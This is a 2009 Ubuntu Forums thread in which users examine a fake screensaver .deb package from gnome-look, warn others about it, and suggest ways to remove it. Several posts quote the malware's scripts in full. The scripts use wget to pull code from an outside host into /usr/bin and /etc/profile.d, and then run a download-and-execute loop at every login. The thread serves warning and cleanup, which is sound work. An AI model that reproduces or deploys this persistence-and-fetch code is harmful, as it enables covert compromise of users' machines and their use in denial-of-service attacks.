Hello guys Im going to make this breef I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded. after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below) (also no screensaver was ever shown in gnome-screensaver) #!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit Im no expert but this looks just wrong!! I have removed the package however I i doubt this has done much good... Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed. This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages? Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack... Sorry for sounding strange, Just trying to fix this A.S.A.P. Thank you for any suggestions.
Last edited by dmizer; December 9th, 2009 at 02:06 AM. Reason: removed hyperlinking to malitious urls
Excuse my noobishness, but it appears that the DEB replace those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked though.
What is the link(url) for this alleged screensaver Please not as hyper link but plain text.
definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I;m not seeing it do much. for instance the bash replacement seems to just ping a site "mmowned.com " or some such.
This is the contents of the Auto.bash script. Code: while : do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done you may want to se if run.bash is running. if so kill it. And then remove it from /usr/bin/ gnome.sh runs Auto.bash Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
while : do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done
Last edited by pbrane; December 8th, 2009 at 08:54 PM.
Originally Posted by conorsulli #!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit Ultimately this seems to be happening: ping -s 65507 www.mmowned.com which may happen everytime you log in - plus it seems designed to keep what it can run updated. There's a php file involved too, but I cannot figure out what part that has to play. I think you may have just been PWNED.
http://www.imbjr.com
OK guys please help me remove from gnome-look this file i have browsed the source codes and it contains something definatley malicious http://www.gnome-look.org/content/sh...content=116772 please dont install it im working on contacting others who have installed it and redirecting them here to resolve the issue
Last edited by conorsulli; December 9th, 2009 at 05:27 AM.
yes noticed this after further looking... gonna get this guy good
OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!
Another day has passed and I'm just a little bit smarter.
No, you're right. Whatever goes into /etc/profile.d gets run everytime someone logs in. It then downloads another script and runs that. Right now, it is just ping -s 65507 www.mmowned.com which could at least be used to collect IP's, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at anytime, it could easily be used to use your computer to assist in a "Denial of Service" attack. I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".
(\ /) (O.o) (> <)This is Bunny. Copy Bunny into your signature to help him on his way to world domination.
View Tag Cloud
Ubuntu Forums Code of Conduct